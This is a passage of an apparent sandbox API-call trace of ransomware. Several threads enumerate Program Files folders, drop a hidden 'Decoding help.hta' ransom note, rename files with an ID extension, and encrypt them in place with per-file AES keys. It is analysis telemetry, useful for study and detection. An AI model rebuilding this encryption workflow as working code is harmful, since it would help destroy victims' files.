lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES\\Decoding help.hta" [0059.391] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\es-es\\decoding help.hta")) returned 0xffffffff [0059.391] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\es-es\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4bc [0060.632] WriteFile (in: hFile=0x4bc, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1fe9fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1fe9fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0060.633] CloseHandle (hObject=0x4bc) returned 1 [0060.633] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0060.865] lstrcmpiW (lpString1="Decoding help.hta", lpString2="tipresx.dll.mui") returned -1 [0060.866] lstrlenW (lpString="tipresx.dll.mui") returned 15 [0060.866] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES\\*.*" [0060.866] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES\\*.*") returned 64 [0060.866] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES\\", lpString2="tipresx.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES\\tipresx.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES\\tipresx.dll.mui" [0060.866] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES\\tipresx.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES\\tipresx.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES\\tipresx.dll.mui" [0060.866] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES\\tipresx.dll.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES\\tipresx.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES\\tipresx.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0060.866] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\es-es\\tipresx.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES\\tipresx.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\es-es\\tipresx.dll.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0060.868] FindNextFileW (in: hFindFile=0x10fbc658, lpFindFileData=0x1fe9fd30 | out: lpFindFileData=0x1fe9fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3f3c6a2, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe41519b8, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe41519b8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0060.868] FindClose (in: hFindFile=0x10fbc658 | out: hFindFile=0x10fbc658) returned 1 Thread: id = 748 os_tid = 0xff8 [0054.489] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fi_FI\\*.*", lpFindFileData=0x1931fd30 | out: lpFindFileData=0x1931fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5cc7c0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d5cc7c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d5cc7c0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671830 [0056.833] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0056.834] FindNextFileW (in: hFindFile=0x671830, lpFindFileData=0x1931fd30 | out: lpFindFileData=0x1931fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5cc7c0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d5cc7c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d5cc7c0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.834] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0056.834] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0056.834] FindNextFileW (in: hFindFile=0x671830, lpFindFileData=0x1931fd30 | out: lpFindFileData=0x1931fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d5cc7c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x15d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Reader_10.0.helpcfg", cAlternateFileName="READER~1.HEL")) returned 1 [0056.834] lstrcpyW (in: lpString1=0x33fa320, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fi_FI\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fi_FI\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fi_FI\\*.*" [0056.834] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fi_FI\\*.*") returned 63 [0056.834] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fi_FI\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fi_FI\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fi_FI\\Decoding help.hta" [0056.834] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fi_FI\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\fi_fi\\decoding help.hta")) returned 0xffffffff [0056.834] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fi_FI\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\fi_fi\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xa88 [0058.296] WriteFile (in: hFile=0xa88, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1931fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1931fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0058.297] CloseHandle (hObject=0xa88) returned 1 [0058.297] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fi_FI\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.297] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Reader_10.0.helpcfg") returned -1 [0058.297] lstrlenW (lpString="Reader_10.0.helpcfg") returned 19 [0058.297] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fi_FI\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fi_FI\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fi_FI\\*.*" [0058.297] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fi_FI\\*.*") returned 63 [0058.298] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fi_FI\\", lpString2="Reader_10.0.helpcfg" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fi_FI\\Reader_10.0.helpcfg") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fi_FI\\Reader_10.0.helpcfg" [0058.298] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fi_FI\\Reader_10.0.helpcfg" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fi_FI\\Reader_10.0.helpcfg") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fi_FI\\Reader_10.0.helpcfg" [0058.298] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fi_FI\\Reader_10.0.helpcfg", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fi_FI\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fi_FI\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]" [0058.298] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fi_FI\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\fi_fi\\reader_10.0.helpcfg"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fi_FI\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\fi_fi\\reader_10.0.helpcfg.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.298] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fi_FI\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\fi_fi\\reader_10.0.helpcfg.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xa88 [0058.298] CreateFileMappingA (hFile=0xa88, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xa8c [0058.299] CryptAcquireContextA (in: phProv=0x1931fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1931fcec*=0x254585c0) returned 1 [0060.826] CryptGenKey (in: hProv=0x254585c0, Algid=0x6610, dwFlags=0x1, phKey=0x1931fce8 | out: phKey=0x1931fce8*=0x42cf718) returned 1 [0060.902] CryptExportKey (in: hKey=0x42cf718, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x1931fbe4, pdwDataLen=0x1931fce4 | out: pbData=0x1931fbe4*, pdwDataLen=0x1931fce4*=0x2c) returned 1 [0060.902] MapViewOfFile (hFileMappingObject=0xa8c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x140) returned 0x39c0000 [0064.143] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1931fbe4*, pdwDataLen=0x1931fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x1931fbe4*, pdwDataLen=0x1931fcf8*=0x100) returned 1 [0064.144] CryptEncrypt (in: hKey=0x42cf718, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x39c0000*, pdwDataLen=0x1931fce4*=0x140, dwBufLen=0x140 | out: pbData=0x39c0000*, pdwDataLen=0x1931fce4*=0x140) returned 1 [0064.144] UnmapViewOfFile (lpBaseAddress=0x39c0000) returned 1 [0064.146] CloseHandle (hObject=0xa8c) returned 1 [0064.146] CryptDestroyKey (hKey=0x42cf718) returned 1 [0064.146] CryptReleaseContext (hProv=0x254585c0, dwFlags=0x0) returned 1 [0064.146] SetFilePointerEx (in: hFile=0xa88, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0064.146] WriteFile (hFile=0xa88, lpBuffer=0x1931fbe4, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x1931fcf8, lpOverlapped=0x0) Thread: id = 749 os_tid = 0xffc [0054.491] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE\\*.*", lpFindFileData=0x1ffdfd30 | out: lpFindFileData=0x1ffdfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10fbc698 [0059.392] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0059.392] FindNextFileW (in: hFindFile=0x10fbc698, lpFindFileData=0x1ffdfd30 | out: lpFindFileData=0x1ffdfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0059.392] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0059.392] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0059.392] FindNextFileW (in: hFindFile=0x10fbc698, lpFindFileData=0x1ffdfd30 | out: lpFindFileData=0x1ffdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb4e9cfd, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xeb74b2cd, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xeb74b2cd, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0059.392] lstrcpyW (in: lpString1=0x2a820628, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE\\*.*" [0059.392] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE\\*.*") returned 64 [0059.392] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE\\Decoding help.hta" [0059.392] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\et-ee\\decoding help.hta")) returned 0xffffffff [0059.392] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\et-ee\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4bc [0060.633] WriteFile (in: hFile=0x4bc, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1ffdfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1ffdfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0060.634] CloseHandle (hObject=0x4bc) returned 1 [0060.634] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0060.867] lstrcmpiW (lpString1="Decoding help.hta", lpString2="tipresx.dll.mui") returned -1 [0060.867] lstrlenW (lpString="tipresx.dll.mui") returned 15 [0060.867] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE\\*.*" [0060.867] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE\\*.*") returned 64 [0060.867] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE\\", lpString2="tipresx.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE\\tipresx.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE\\tipresx.dll.mui" [0060.867] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE\\tipresx.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE\\tipresx.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE\\tipresx.dll.mui" [0060.867] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE\\tipresx.dll.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE\\tipresx.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE\\tipresx.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0060.867] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\et-ee\\tipresx.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE\\tipresx.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\et-ee\\tipresx.dll.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0060.869] FindNextFileW (in: hFindFile=0x10fbc698, lpFindFileData=0x1ffdfd30 | out: lpFindFileData=0x1ffdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb4e9cfd, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xeb74b2cd, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xeb74b2cd, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0060.869] FindClose (in: hFindFile=0x10fbc698 | out: hFindFile=0x10fbc698) returned 1 Thread: id = 750 os_tid = 0x6fc [0054.492] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fr_FR\\*.*", lpFindFileData=0x2011fd30 | out: lpFindFileData=0x2011fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d580500, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d580500, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d580500, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6710b0 [0055.974] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0055.974] FindNextFileW (in: hFindFile=0x6710b0, lpFindFileData=0x2011fd30 | out: lpFindFileData=0x2011fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d580500, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d580500, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d580500, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0055.974] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0055.974] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0055.974] FindNextFileW (in: hFindFile=0x6710b0, lpFindFileData=0x2011fd30 | out: lpFindFileData=0x2011fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d580500, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x15d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Reader_10.0.helpcfg", cAlternateFileName="READER~1.HEL")) returned 1 [0055.974] lstrcpyW (in: lpString1=0x4280798, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fr_FR\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fr_FR\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fr_FR\\*.*" [0055.974] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fr_FR\\*.*") returned 63 [0055.974] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fr_FR\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fr_FR\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fr_FR\\Decoding help.hta" [0055.974] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fr_FR\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\fr_fr\\decoding help.hta")) returned 0xffffffff [0055.975] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fr_FR\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\fr_fr\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x934 [0057.404] WriteFile (in: hFile=0x934, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2011fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x2011fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0057.405] CloseHandle (hObject=0x934) returned 1 [0057.405] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fr_FR\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0057.405] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Reader_10.0.helpcfg") returned -1 [0057.405] lstrlenW (lpString="Reader_10.0.helpcfg") returned 19 [0057.405] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fr_FR\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fr_FR\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fr_FR\\*.*" [0057.405] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fr_FR\\*.*") returned 63 [0057.405] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fr_FR\\", lpString2="Reader_10.0.helpcfg" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fr_FR\\Reader_10.0.helpcfg") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fr_FR\\Reader_10.0.helpcfg" [0057.405] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fr_FR\\Reader_10.0.helpcfg" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fr_FR\\Reader_10.0.helpcfg") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fr_FR\\Reader_10.0.helpcfg" [0057.405] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fr_FR\\Reader_10.0.helpcfg", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fr_FR\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fr_FR\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]" [0057.405] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fr_FR\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\fr_fr\\reader_10.0.helpcfg"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fr_FR\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\fr_fr\\reader_10.0.helpcfg.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0057.406] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common 